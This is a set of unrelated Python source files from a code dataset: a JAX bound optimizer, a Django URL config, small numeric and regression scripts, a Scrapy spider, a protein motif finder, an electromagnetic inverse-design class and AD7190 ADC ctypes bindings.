ls_loop_args[0].any()\n\n ## Define the function for the optimization loop\n # Perform the Fista with backtracking line search algorithm, as described\n # in \"A Fast Iterative Shrinkage-Thresholding Algorithm\", Beck and Teboulle\n # The only change is that we increase the step size by a factor of\n # self._beta_h for step size that didn't need to be reduced at all during\n # the linesearch.\n # This is performed in a jax.lax.while_loop, with the following arguments:\n # opt_loop_args:\n # it: Iteration counter\n # x, y: variable set\n # gamma: float, coefficient used for the momentum (t_k in the paper)\n # step_size: Array containing the current values of the step size.\n # objectives: Coefficients of the objective functions.\n # We stop either based on a maximum number of iterations, or based on the\n # convergence between the primal objective and the dual objective, which is\n # checked every self._check_convergence_every iterations.\n def fista_with_linesearch_step(\n opt_loop_args: Tuple[int, ParamSet, ParamSet, Tensor, Tensor, ParamSet],\n ) -> Tuple[int, ParamSet, ParamSet, Tensor, Tensor, ParamSet]:\n it, x, y, gamma, step_size, objectives = opt_loop_args\n # Compute f_y and d(f_y)/d(y)\n value_and_gradofsum_fn = jax.value_and_grad(non_convex_bound.primal_sumfn,\n has_aux=True)\n (_, (f_y, _)), grad_y = value_and_gradofsum_fn(y, objectives)\n\n # Compute the step size to use with a line search\n y_stats = (y, f_y, grad_y)\n ini_need_lower = should_decrease(step_size, y_stats, objectives)\n _, new_step_size, _, _ = jax.lax.while_loop(\n any_need_lower_stepsize,\n lower_stepsize_if_needed,\n (ini_need_lower, step_size, y_stats, objectives))\n\n # Perform the updates\n new_x = _pgd_step(y, grad_y, -new_step_size)\n # Momentum update from the paper: t_{k+1} = (1 + sqrt(1 + 4 * t_k^2)) / 2.\n new_gamma = (1 + jnp.sqrt(1 + 4 * gamma ** 2)) / 2\n coeff = (gamma - 1) / new_gamma\n\n new_y = {}\n for key, new_x_var in new_x.items():\n new_y[key] = new_x_var + coeff * (new_x_var - x[key])\n\n # Increase the step size of the samples that didn't need reducing.\n new_step_size = jnp.where(ini_need_lower,\n new_step_size, self._beta_h * new_step_size)\n\n return it + 1, new_x, new_y, new_gamma, new_step_size, objectives\n\n def not_all_converged(not_converged_args: Tuple[ParamSet, ParamSet],\n ) -> bool:\n x, objectives = not_converged_args\n primal, dual = non_convex_bound.dual(x, objectives)\n dgap_value = primal - dual\n if self._check_relative_dual_gap:\n bound_scale = 0.5 * (jnp.abs(primal) + jnp.abs(dual))\n termination_gap = (1 + bound_scale) * self._termination_dual_gap\n else:\n termination_gap = self._termination_dual_gap\n\n return (dgap_value > termination_gap).any()\n\n def continue_criterion(\n opt_loop_args: Tuple[int, ParamSet, ParamSet, Tensor, Tensor, ParamSet],\n ) -> Tensor:\n it, x, *_, objectives = opt_loop_args\n not_all_iterations = (it < self._num_steps)\n opt_not_converged = jax.lax.cond(\n (it % self._check_convergence_every) == 0.,\n not_all_converged,\n lambda _: jnp.array(True),\n operand=(x, objectives))\n return jnp.logical_and(opt_not_converged, not_all_iterations)\n\n ## Define the function to optimize a chunk of the nodes of the activation.\n def optimize(objectives: ParamSet, x: ParamSet) -> ParamSet:\n y = x\n target_dims = objectives[non_convex_bound.index].shape[0]\n gamma = jnp.array(0.)\n step_size = self._max_step_size * jnp.ones(target_dims)\n it = jnp.array(0)\n\n _, final_x, _, _, _, _ = jax.lax.while_loop(\n continue_criterion,\n fista_with_linesearch_step,\n (it, x, y, gamma, step_size, objectives))\n\n return 
optimize\n\n\nclass PGDOptimizer(BoundOptimizer):\n \"\"\"Projected Gradient Optimizer.\n\n Optimization can either by taking gradients with respect to the primal or the\n dual objective.\n\n Passing a number of steps equal to zero will result in the bound derived from\n the initialization.\n \"\"\"\n\n def __init__(self, num_steps: int, step_size: float,\n optimize_dual: bool = False):\n self._num_steps = num_steps\n self._step_size = step_size\n self._optimize_dual = optimize_dual\n\n def optimize_fun(self, non_convex_bound: nonconvex.NonConvexBound,\n ) -> Callable[[ParamSet, ParamSet], ParamSet]:\n \"\"\"Returns a function optimizing the primal variables.\n\n Args:\n non_convex_bound: NonConvex object to define the objective function over\n Returns:\n optimize: Optimization function.\n \"\"\"\n # If we are going to actually perform optimization, define the function to\n # minimize (either the primal, or the negative of the dual),\n # its gradient and the projection function to use.\n if self._num_steps:\n def fun_to_opt(opt_vars, objectives):\n if self._optimize_dual:\n _, dual_vals = non_convex_bound.dual(opt_vars, objectives)\n obj = -jnp.sum(dual_vals)\n else:\n obj, _ = non_convex_bound.primal_sumfn(opt_vars, objectives)\n return obj\n grad_fun = jax.grad(fun_to_opt)\n proj_fun = lambda x: jnp.clip(x, 0., 1.)\n\n # Define the optimizer. Because we are minimizing the objective function,\n # we will scale the gradient by a negative step size.\n tx = optax.scale(-self._step_size)\n\n # Define the function to optimize a chunk of the nodes of the activation.\n def optimize(objectives: ParamSet, var_set: ParamSet) -> ParamSet:\n\n # Perform the optimization.\n if self._num_steps:\n state = tx.init(var_set)\n\n def opt_step(_, state_and_var):\n state, var_set = state_and_var\n grads = grad_fun(var_set, objectives)\n updates, new_state = tx.update(grads, state, var_set)\n unc_var_set = optax.apply_updates(var_set, updates)\n new_var_set = jax.tree_map(proj_fun, unc_var_set)\n return new_state, new_var_set\n\n _, var_set = jax.lax.fori_loop(0, self._num_steps, opt_step,\n (state, var_set))\n\n return var_set\n\n return optimize\n\n","sub_path":"jax_verify/src/nonconvex/optimizers.py","file_name":"optimizers.py","file_ext":"py","file_size_in_byte":24637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"291998991","text":"\"\"\"qrating URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.conf.urls import url, include\r\n 2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.conf.urls import url\r\nfrom django.contrib import admin\r\nfrom django.urls import path\r\n\r\nfrom accounts import views as accounts_views\r\nfrom blog import views\r\n\r\nfrom django.conf import settings\r\nfrom django.conf.urls.static import static\r\n\r\nurlpatterns = [\r\n url(r'^admin/', admin.site.urls),\r\n\r\n url(r'^$', views.home, name = \"home\"),\r\n path('question/<int:pk>/', views.detail_question, name = \"detail_question\"),\r\n url(r'^create_question/$', views.create_question, name = \"create_question\"),\r\n path('question/<int:pk>/remove/', views.question_remove, name='question_remove'),\r\n path('question/<int:pk>/update/', views.question_update, name='question_update'),\r\n path('select/<int:pk>/', views.select_question, name='select_question'),\r\n path('answer_remove/<int:pk>/', views.answer_remove, name='answer_remove'),\r\n path('answer_update/<int:pk>/', views.answer_update, name='answer_update'),\r\n path('search', views.search, name='search'),\r\n path('cate_search/<str:cate>/', views.cate_search, name=\"cate_search\"),\r\n\r\n # accounts\r\n url(r'^register/$', accounts_views.register, name='register'),\r\n url(r'^logout/$', accounts_views.logout, name = 'logout'),\r\n url(r'^login/$', accounts_views.login, name='login'),\r\n path('mypage/', accounts_views.mypage, name='mypage'),\r\n path('change_pw/', accounts_views.change_pw, name='change_pw'),\r\n path('send_email/', accounts_views.send_email, name='send_email'),\r\n path('activate/<str:uidb64>/<str:token>/', accounts_views.activate, name='activate'),\r\n path('change_info/', accounts_views.change_info, name='change_info'),\r\n]\r\nurlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)","sub_path":"qrating/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"592611160","text":"\r\nimport math\r\nx = float(input(\"Enter x: \"))\r\nq = float(input(\"Enter q: \"))\r\ncos = 1\r\ncount = 1\r\nzn = -1\r\nx2 = x*x\r\nf = 2 \r\nn = 2\r\nwhile ((x2/f) >= q ):\r\n cos = cos + zn*x2/f\r\n count = count + 1\r\n n = n + 2\r\n x2 = x2 * x * x\r\n f = f * (n - 1) * n\r\n zn = zn * (-1)\r\n print(\"cos(x): \"+str(cos))\r\n\r\n","sub_path":"задача 4.py","file_name":"задача 4.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"530185524","text":"import numpy as np\nimport pandas as pd\nfrom sklearn import linear_model\nfrom sklearn.model_selection import cross_val_score\n\nfeatures = ['Feature 1','Feature 2','Feature 3','Feature 4','Feature 5 (meaningless but please still use it)', 'Feature 6','Feature 7','Feature 8','Feature 9','Feature 10']\n\ndata = pd.read_csv(\"C:\\\\Users\\\\ericj\\\\PycharmProjects\\\\Assignment1\\\\The SUM dataset, with noise.csv\", sep=\";\" , nrows = 100)\nX, y = data.loc[:,features], data[\"Noisy Target\"]\nmodel = linear_model.Ridge(normalize=True)\n\n# RMS Error\nmean_squared_error = cross_val_score(model,X,y,cv=10,scoring=\"neg_mean_squared_error\") * -1\nroot_mean_squared_error = np.sqrt(mean_squared_error)\n# Absolute mean error\nabs_mean_error = cross_val_score(model, X, y, cv=10, scoring=\"neg_mean_absolute_error\")\nabs_mean_error = abs_mean_error * -1\nabs_mean_error = abs_mean_error.mean()\n# R2 score\nr2_score = cross_val_score(model, X, y, cv = 10, scoring = \"r2\")\n# Median absolute error\nmedian_absolute_error = cross_val_score(model, X, y, 
cv = 10, scoring = \"neg_median_absolute_error\") * -1\n# Mean squared log error\nmean_squared_log_error = cross_val_score(model, X, y, cv = 10, scoring = \"neg_mean_squared_log_error\") * -1\n\nprint(\"Mean squared log error with sample size of 100 =\", mean_squared_log_error.mean())\nprint(\"Median absolute error with sample size of 100 =\", median_absolute_error.mean())\nprint(\"R2 score with sample size of 100 =\", r2_score.mean())\nprint(\"RMS error with sample size of 100 =\", root_mean_squared_error.mean())\nprint(\"Absolute mean error with sample size of 100 =\", abs_mean_error)\n","sub_path":"Task3/RidgeRegression-SUMwithNoise.py","file_name":"RidgeRegression-SUMwithNoise.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"66881592","text":"import scrapy\nfrom joker.items import JokerItem\n\n\nclass JokerSpider(scrapy.Spider):\n name = \"joker\"\n allowed_domains = [\"hupu.com\"]\n start_urls = []\n\n def __init__(self):\n super(JokerSpider, self).__init__()\n self.index = 1\n self.url_pre = \"http://my.hupu.com/search?q=%A1%B6%B2%BB%C0%E4%D0%A6%BB%B0%A1%B7%B5%DA&type=topic&page=\"\n self.url_post = \"&fid=34&sortby=datedesc\"\n url = self.url_pre + str(self.index) + self.url_post\n self.start_urls.append(url)\n # for i in xrange(1,31):\n # url = \"http://my.hupu.com/search?q=%A1%B6%B2%BB%C0%E4%D0%A6%BB%B0%A1%B7%B5%DA&type=topic&page=\" + str(i) + \"&fid=34&sortby=datedesc\"\n # self.start_urls.append(url)\n\n def parse(self, response):\n for line in response.xpath('//table/tbody/tr/td[1]/a'):\n item = JokerItem()\n item['title'] = line.xpath('text()').extract()\n item['link'] = line.xpath('@href').extract()[0]\n yield item\n\n self.index = self.index + 1\n if self.index < 32:\n url = self.url_pre + str(self.index) + self.url_post\n yield scrapy.Request(url, 
self.parse)\n\n","sub_path":"joker/spiders/joker_spider.py","file_name":"joker_spider.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"195456691","text":"#!/usr/bin/env python3\n\n########################################################################\n\n# The N-glycosylation motif looks a lot like a regular expression. I\n# suppose now is as good a time as any to dive into the Python re\n# package and really figure out what's what.\n\n########################################################################\n\nimport sys\nfrom urllib.request import urlopen\nimport regex\n\nglyco_pattern=\"N[^P][ST][^P]\"\nuniprot_base = \"http://www.uniprot.org/uniprot/{0}.fasta\"\n\ndef protein_string(url):\n \"\"\"Returns the protein string of the FASTA file at the given\n URL.\"\"\"\n\n assert url[-5:] == \"fasta\"\n data = \"\"\n for line in urlopen(url):\n x = line.decode().strip()\n if x[0] != '>':\n data += x\n return data\n\ndef find_motif(string, pattern):\n \"\"\"Returns all (overlapping) locations of the motif pattern\n in string.\"\"\"\n\n g = list()\n for match in regex.finditer(pattern, string, overlapped=True):\n g.append(match.start())\n return g\n \n\nif __name__==\"__main__\":\n names = list()\n urls = list()\n seqs = list()\n\n for sequence in sys.stdin:\n sequence = sequence.strip()\n names.append(sequence)\n urls.append(uniprot_base.format(sequence))\n\n for url in urls:\n seqs.append(protein_string(url))\n\n for x in zip(names, seqs):\n locations = find_motif(x[1], glyco_pattern)\n if locations:\n print(x[0])\n for location in locations:\n print(location+1, end=\" \") # \n print(\"\")\n","sub_path":"problems/level-5/mprt/mprt.py","file_name":"mprt.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"125894458","text":"#\n# System\n#\nimport sys\nimport os\n\n#\n# Math\n#\nimport numpy as np\nimport scipy.optimize\n\nfrom scipy.ndimage import gaussian_filter\nfrom scipy.interpolate import RectBivariateSpline\n\nsys.path.insert(1, '../')\nimport heaviside\n\niter_idx = 0\nfom_evolution = []\nbinarization_evolution = []\n\n#\n# Electromagnetics\n#\nrun_on_cluster = True\n\nif run_on_cluster:\n\tsys.path.append( '/central/home/gdrobert/Develompent/ceviche' )\nimport ceviche\n\n#\n# Topology Optimization\n#\npython_src_directory = os.path.abspath(os.path.join(os.path.dirname(__file__), '.'))\n\neps_nought = 8.854 * 1e-12\nmu_nought = 1.257 * 1e-6 \nc = 3.0 * 1e8\nsmall = 1e-10\n\ndef upsample( input_block, factor ):\n\tinput_block_size = input_block.shape\n\toutput_block_size = [ int( k * factor ) for k in input_block_size ]\n\n\toutput_block = np.zeros( output_block_size, input_block.dtype )\n\n\tfor x_idx in range( 0, output_block_size[ 0 ] ):\n\t\tfor y_idx in range( 0, output_block_size[ 1 ] ):\n\t\t\toutput_block[ x_idx, y_idx ] = input_block[ int( x_idx / factor ), int( y_idx / factor ) ]\n\n\treturn output_block\n\nclass DeepEM():\n\n\tdef __init__( self,\n\t\tdevice_size_voxels, num_layers, coarsen_factor, mesh_size_nm,\n\t\tpermittivity_bounds, focal_length_y_voxels,\n\t\twavelength_um, random_seed, save_folder ):\n\t\t\n\t\tself.device_width_voxels = device_size_voxels[ 0 ]\n\t\tself.device_height_voxels = device_size_voxels[ 1 ]\n\n\t\tself.coarsen_factor = coarsen_factor\n\t\tassert ( self.device_width_voxels % coarsen_factor ) == 0, \"The specified coarsening factor does not evenly 
divide the device width in voxels!\"\n\t\tassert ( self.device_height_voxels % coarsen_factor ) == 0, \"The specified coarsening factor does not evenly divide the device height in voxels!\"\n\n\t\tself.design_width_voxels = int( device_size_voxels[ 0 ] / coarsen_factor )\n\t\tself.design_height_voxels = int( device_size_voxels[ 1 ] / coarsen_factor )\n\n\t\tself.design_density = None\n\n\t\tself.mesh_size_nm = mesh_size_nm\n\t\tself.mesh_size_um = 1e-3 * mesh_size_nm\n\t\tself.mesh_size_m = 1e-9 * mesh_size_nm\n\n\t\tself.device_size_um = [ self.mesh_size_um * device_size_voxels[ idx ] for idx in range( 0, len( device_size_voxels ) ) ]\n\n\t\tself.permittivity_bounds = permittivity_bounds\n\t\tself.min_relative_permittivity = permittivity_bounds[ 0 ]\n\t\tself.max_relative_permittivity = permittivity_bounds[ 1 ]\n\n\t\tself.focal_length_y_voxels = focal_length_y_voxels\n\t\tself.wavelength_um = wavelength_um\n\n\t\tself.omega = 2 * np.pi * c / ( 1e-6 * wavelength_um )\n\n\t\tself.random_seed = random_seed\n\t\tnp.random.seed( self.random_seed )\n\n\t\tassert( self.design_height_voxels % num_layers ) == 0, \"Expected the number of layers to evenly divide the design region\"\n\n\t\tself.num_layers = num_layers\n\t\tself.design_voxels_per_layer = int( self.design_height_voxels / num_layers )\n\n\t\tself.setup_simulation()\n\n\tdef plot_geometry( self, opt_mask=None ):\n\t\timport matplotlib.pyplot as plt\n\n\t\tdevice_region = np.zeros( ( self.simulation_width_voxels, self.simulation_height_voxels ) )\n\t\tdevice_region[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ] = 100 * np.imag(\n\t\t\tupsample( self.density_to_permittivity( self.design_density ), self.coarsen_factor )\n\t\t)\n\n\t\tdevice_region[\n\t\t\tself.focal_x_start : self.focal_x_end,\n\t\t\tself.focal_point_y - 5 : self.focal_point_y + 5 ] = 2\n\n\t\tplt.subplot( 2, 2, 1 )\n\t\tplt.imshow( np.real( self.fwd_source ) )\n\t\tplt.title( 'Forward Source' )\n\t\tplt.subplot( 2, 2, 2 )\n\t\tplt.imshow( device_region )\n\t\tplt.title( 'Focal Y' )\n\t\tplt.subplot( 2, 2, 3 )\n\t\tplt.imshow( device_region )\n\t\tplt.title( 'Device Region' )\n\t\tplt.show()\n\n\n\tdef gen_random_device( self ):\n\t\tnum_random_values = self.design_width_voxels * self.num_layers\n\n\t\trandom_design_values = np.random.random( num_random_values )\n\n\t\tdef apply_sigmoid( variable_in, beta, eta ):\n\t\t\tnumerator = np.tanh( beta * eta ) + np.tanh( beta * ( variable_in - eta ) )\n\t\t\tdenominator = np.tanh( beta * eta ) + np.tanh( beta * ( 1 - eta ) )\n\n\t\t\treturn ( numerator / denominator )\n\n\t\tbeta = 0.0625 + 20.0 * np.random.random()\n\t\teta = 0.1 + 0.8 * np.random.random()\n\n\t\trandom_design_values = apply_sigmoid( random_design_values, beta, eta )\n\n\t\tself.design_density = np.ones( [ self.design_width_voxels, self.design_height_voxels ] )\n\n\t\tfor layer_idx in range( 0, self.num_layers ):\n\t\t\tlayer_start = layer_idx * self.design_voxels_per_layer\n\t\t\tlayer_end = layer_start + self.design_voxels_per_layer\n\n\t\t\trandom_values_start = layer_idx * self.design_width_voxels\n\t\t\trandom_values_end = random_values_start + self.design_width_voxels\n\n\t\t\tfill_data = random_design_values[ random_values_start : random_values_end ]\n\n\t\t\tfor internal_layer_idx in range( layer_start, layer_end ):\n\t\t\t\tself.design_density[ :, internal_layer_idx ] = 
fill_data\n\n\t\tself.design_density = np.maximum( 0, np.minimum( self.design_density, 1 ) )\n\n\tdef setup_simulation( self ):\n\t\tself.width_gap_voxels = int( 1.0 * self.wavelength_um / self.mesh_size_um )\n\t\tself.height_gap_voxels_top = int( 1.5 * self.wavelength_um / self.mesh_size_um )\n\t\tself.height_gap_voxels_bottom = self.width_gap_voxels\n\t\tself.pml_voxels = int( 1.0 * self.wavelength_um / self.mesh_size_um )\n\n\t\tself.simulation_width_voxels = self.device_width_voxels + 2 * self.width_gap_voxels + 2 * self.pml_voxels\n\t\tself.simulation_height_voxels = self.device_height_voxels + np.maximum( self.focal_length_y_voxels, 0 ) + self.height_gap_voxels_bottom + self.height_gap_voxels_top + 2 * self.pml_voxels\n\n\t\tself.device_width_start = int( 0.5 * ( self.simulation_width_voxels - self.device_width_voxels ) )\n\t\tself.device_width_end = self.device_width_start + self.device_width_voxels\n\t\tself.device_height_start = int( self.pml_voxels + self.height_gap_voxels_bottom + np.maximum( self.focal_length_y_voxels, 0 ) )\n\t\tself.device_height_end = self.device_height_start + self.device_height_voxels\n\n\t\tself.fwd_src_y = int( self.pml_voxels + self.height_gap_voxels_bottom + np.maximum( self.focal_length_y_voxels, 0 ) + self.device_height_voxels + 0.75 * self.height_gap_voxels_top )\n\t\tself.focal_point_y = int( self.pml_voxels + self.height_gap_voxels_bottom - np.minimum( self.focal_length_y_voxels, 0 ) )\n\n\t\tself.focal_x_start = self.pml_voxels\n\t\tself.focal_x_end = self.focal_x_start + 2 * self.width_gap_voxels + self.device_width_voxels\n\n\t\tself.rel_eps_simulation = np.ones( ( self.simulation_width_voxels, self.simulation_height_voxels ), dtype=np.complex )\n\n\t\tfwd_src_x_range = np.arange( 0, self.simulation_width_voxels )\n\t\tfwd_src_y_range = self.fwd_src_y * np.ones( fwd_src_x_range.shape, dtype=int )\n\n\t\tself.fwd_source = np.zeros( ( self.simulation_width_voxels, self.simulation_height_voxels ), dtype=np.complex )\n\t\tself.fwd_source[ fwd_src_x_range, fwd_src_y_range ] = 1\n\n\n\tdef get_device_efields( self ):\n\t\timport_density = upsample( self.design_density, self.coarsen_factor )\n\t\tdevice_permittivity = self.density_to_permittivity( import_density )\n\t\tself.rel_eps_simulation[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ] = device_permittivity\n\n\t\tEz = self.compute_forward_fields( self.omega, device_permittivity )\n\n\t\treturn Ez[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ]\n\n\tdef get_focal_efields( self ):\n\t\timport_density = upsample( self.design_density, self.coarsen_factor )\n\t\tdevice_permittivity = self.density_to_permittivity( import_density )\n\t\tself.rel_eps_simulation[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ] = device_permittivity\n\n\t\tEz = self.compute_forward_fields( self.omega, device_permittivity )\n\n\t\treturn Ez[ self.focal_x_start : self.focal_x_end, self.focal_point_y ]\n\n\tdef compute_forward_fields( self, omega, device_permittivity ):\n\t\tself.rel_eps_simulation[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ] = device_permittivity\n\n\t\tsimulation = ceviche.fdfd_ez( omega, self.mesh_size_m, self.rel_eps_simulation, [ self.pml_voxels, self.pml_voxels ] )\n\t\tfwd_Hx, fwd_Hy, fwd_Ez = simulation.solve( self.fwd_source )\n\n\t\treturn fwd_Ez\n\n\tdef density_to_permittivity( self, 
density ):\n\t\treturn ( self.min_relative_permittivity + ( self.max_relative_permittivity - self.min_relative_permittivity ) * density )\n\n\n\n","sub_path":"inverse_design/Landscape/DeepEM.py","file_name":"DeepEM.py","file_ext":"py","file_size_in_byte":8379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"315898261","text":"from ctypes import *\n\ndll = CDLL(\"ad7190_linux/ad7190.so\")\n\n# SPI slave device ID\nSLAVE_ID = 1\n\n# AD7190 Register Map\nREG_COMM = 0 # Communications Register (WO, 8-bit) \nREG_STAT = 0 # Status Register (RO, 8-bit) \nREG_MODE = 1 # Mode Register (RW, 24-bit) \nREG_CONF = 2 # Configuration Register (RW, 24-bit)\nREG_DATA = 3 # Data Register (RO, 24/32-bit) \nREG_ID = 4 # ID Register (RO, 8-bit) \nREG_GPOCON = 5 # GPOCON Register (RW, 8-bit) \nREG_OFFSET = 6 # Offset Register (RW, 24-bit) \nREG_FULLSCALE = 7 # Full-Scale Register (RW, 24-bit)\n\n# Communications Register Bit Designations (AD7190_REG_COMM)\nCOMM_WEN = (1 << 7) # Write Enable. \nCOMM_WRITE = (0 << 6) # Write Operation.\nCOMM_READ = (1 << 6) # Read Operation. \nCOMM_ADDR = lambda x: (((x) & 0x7) << 3) # Register Address. \nCOMM_CREAD = (1 << 2) # Continuous Read of Data Register.\n\n# Status Register Bit Designations (AD7190_REG_STAT)\nSTAT_RDY = (1 << 7) # Ready.\nSTAT_ERR = (1 << 6) # ADC error bit.\nSTAT_NOREF = (1 << 5) # Error no external reference. \nSTAT_PARITY = (1 << 4) # Parity check of the data register. \nSTAT_CH2 = (1 << 2) # Channel 2. 
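Together with the CH1/CH0 bits below, reports which input channel the conversion in the data register corresponds to.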
\nSTAT_CH1 = (1 << 1) # Channel 1. \nSTAT_CH0 = (1 << 0) # Channel 0. \n\n# Mode Register Bit Designations (AD7190_REG_MODE)\nMODE_SEL = lambda x: (((x) & 0x7) << 21) # Operation Mode Select.\nMODE_DAT_STA = (1 << 20) # Status Register transmission.\nMODE_CLKSRC = lambda x: (((x) & 0x3) << 18) # Clock Source Select.\nMODE_SINC3 = (1 << 15) # SINC3 Filter Select.\nMODE_ENPAR = (1 << 13) # Parity Enable.\nMODE_SCYCLE = (1 << 11) # Single cycle conversion.\nMODE_REJ60 = (1 << 10) # 50/60Hz notch filter.\nMODE_RATE = lambda x: ((x) & 0x3FF) # Filter Update Rate Select.\n\n# Mode Register: AD7190_MODE_SEL(x) options\nMODE_CONT = 0 # Continuous Conversion Mode.\nMODE_SINGLE = 1 # Single Conversion Mode.\nMODE_IDLE = 2 # Idle Mode.\nMODE_PWRDN = 3 # Power-Down Mode.\nMODE_CAL_INT_ZERO = 4 # Internal Zero-Scale Calibration.\nMODE_CAL_INT_FULL = 5 # Internal Full-Scale Calibration.\nMODE_CAL_SYS_ZERO = 6 # System Zero-Scale Calibration.\nMODE_CAL_SYS_FULL = 7 # System Full-Scale Calibration.\n\n# Mode Register: AD7190_MODE_CLKSRC(x) options\nCLK_EXT_MCLK1_2 = 0 # External crystal. The external crystal\n # is connected from MCLK1 to MCLK2.\nCLK_EXT_MCLK2 = 1 # External Clock applied to MCLK2 \nCLK_INT = 2 # Internal 4.92 MHz clock. \n # Pin MCLK2 is tristated.\nCLK_INT_CO = 3 # Internal 4.92 MHz clock. The internal\n # clock is available on MCLK2.\n\n# Configuration Register Bit Designations (AD7190_REG_CONF)\nCONF_CHOP = (1 << 23) # CHOP enable.\nCONF_REFSEL = (1 << 20) # REFIN1/REFIN2 Reference Select.\nCONF_CHAN = lambda x: (((x) & 0xFF) << 8) # Channel select.\nCONF_BURN = (1 << 7) # Burnout current enable.\nCONF_REFDET = (1 << 6) # Reference detect enable.\nCONF_BUF = (1 << 4) # Buffered Mode Enable.\nCONF_UNIPOLAR = (1 << 3) # Unipolar/Bipolar Enable.\nCONF_GAIN = lambda x: ((x) & 0x7) # Gain Select.\n\n# Configuration Register: AD7190_CONF_CHAN(x) options\nCH_AIN1P_AIN2M = 0 # AIN1(+) - AIN2(-) \nCH_AIN3P_AIN4M = 1 # AIN3(+) - AIN4(-) \nCH_TEMP_SENSOR = 2 # Temperature sensor \nCH_AIN2P_AIN2M = 3 # AIN2(+) - AIN2(-) \nCH_AIN1P_AINCOM = 4 # AIN1(+) - AINCOM \nCH_AIN2P_AINCOM = 5 # AIN2(+) - AINCOM \nCH_AIN3P_AINCOM = 6 # AIN3(+) - AINCOM \nCH_AIN4P_AINCOM = 7 # AIN4(+) - AINCOM\n\n# Configuration Register: AD7190_CONF_GAIN(x) options\n# ADC Input Range (5 V Reference)\nCONF_GAIN_1 = 0 # Gain 1 +-5 V\nCONF_GAIN_8 = 3 # Gain 8 +-625 mV\nCONF_GAIN_16 = 4 # Gain 16 +-312.5 mV\nCONF_GAIN_32 = 5 # Gain 32 +-156.2 mV\nCONF_GAIN_64 = 6 # Gain 64 +-78.125 mV\nCONF_GAIN_128 = 7 # Gain 128 +-39.06 mV\n\n# ID Register Bit Designations (AD7190_REG_ID)\nID = 0x4\nID_MASK = 0x0F\n\n# GPOCON Register Bit Designations (AD7190_REG_GPOCON)\nGPOCON_BPDSW = (1 << 6) # Bridge power-down switch enable\nGPOCON_GP32EN = (1 << 5) # Digital Output P3 and P2 enable\nGPOCON_GP10EN = (1 << 4) # Digital Output P1 and P0 enable\nGPOCON_P3DAT = (1 << 3) # P3 state\nGPOCON_P2DAT = (1 << 2) # P2 state\nGPOCON_P1DAT = (1 << 1) # P1 state\nGPOCON_P0DAT = (1 << 0) # P0 state\n\n\n# Writes data into a register.\ndll.AD7190_SetRegisterValue.restype = None\ndll.AD7190_SetRegisterValue.argtypes = [c_ubyte, c_ulong, c_ubyte, c_ubyte]\ndef set_register_value(*args):\n return dll.AD7190_SetRegisterValue(*args);\n\n# Reads the value of a register.\ndll.AD7190_GetRegisterValue.restype = c_ulong\ndll.AD7190_GetRegisterValue.argtypes = [c_ubyte, c_ubyte, c_ubyte];\ndef get_register_value(*args):\n return dll.AD7190_GetRegisterValue(*args)\n\n# Checks if the AD7139 part is present.\ndll.AD7190_Init.restype = c_ubyte\ndll.AD7190_Init.argtypes 
= [];\ndef init(*args):\n return dll.AD7190_Init(*args)\n\n# Resets the device.\ndll.AD7190_Reset.restype = None\ndll.AD7190_Reset.argtypes = [];\ndef reset(*args):\n return dll.AD7190_Reset(*args)\n\n# Set device to idle or power-down.\ndll.AD7190_SetPower.restype = None\ndll.AD7190_SetPower.argtypes = [c_ubyte];\ndef set_power(*args):\n return dll.AD7190_SetPower(*args)\n\n# Waits for RDY pin to go low.\ndll.AD7190_WaitRdyGoLow.restype = None\ndll.AD7190_WaitRdyGoLow.argtypes = [];\ndef wait_rdy_go_low(*args):\n return dll.AD7190_WaitRdyGoLow(*args)\n\n# Selects the channel to be enabled.\ndll.AD7190_ChannelSelect.restype = None\ndll.AD7190_ChannelSelect.argtypes = [c_ushort];\ndef channel_select(*args):\n return dll.AD7190_ChannelSelect(*args)\n\n# Performs the given calibration to the specified channel.\ndll.AD7190_Calibrate.restype = None\ndll.AD7190_Calibrate.argtypes = [c_ubyte, c_ubyte];\ndef calibrate(*args):\n return dll.AD7190_Calibrate(*args)\n\n# Selects the polarity of the conversion and the ADC input range.\ndll.AD7190_RangeSetup.restype = None\ndll.AD7190_RangeSetup.argtypes = [c_ubyte, c_ubyte];\ndef range_setup(*args):\n return dll.AD7190_RangeSetup(*args)\n\n# Returns the result of a single conversion.\ndll.AD7190_SingleConversion.restype = c_ulong\ndll.AD7190_SingleConversion.argtypes = [];\ndef single_conversion(*args):\n return dll.AD7190_SingleConversion(*args)\n\n# Returns the average of several conversion results.\ndll.AD7190_ContinuousReadAvg.restype = c_ulong\ndll.AD7190_ContinuousReadAvg.argtypes = [c_ubyte];\ndef continuous_read_avg(*args):\n return dll.AD7190_ContinuousReadAvg(*args)\n\n# Read data from temperature sensor and converts it to Celsius degrees.\ndll.AD7190_TemperatureRead.restype = c_ulong\ndll.AD7190_TemperatureRead.argtypes = [];\ndef 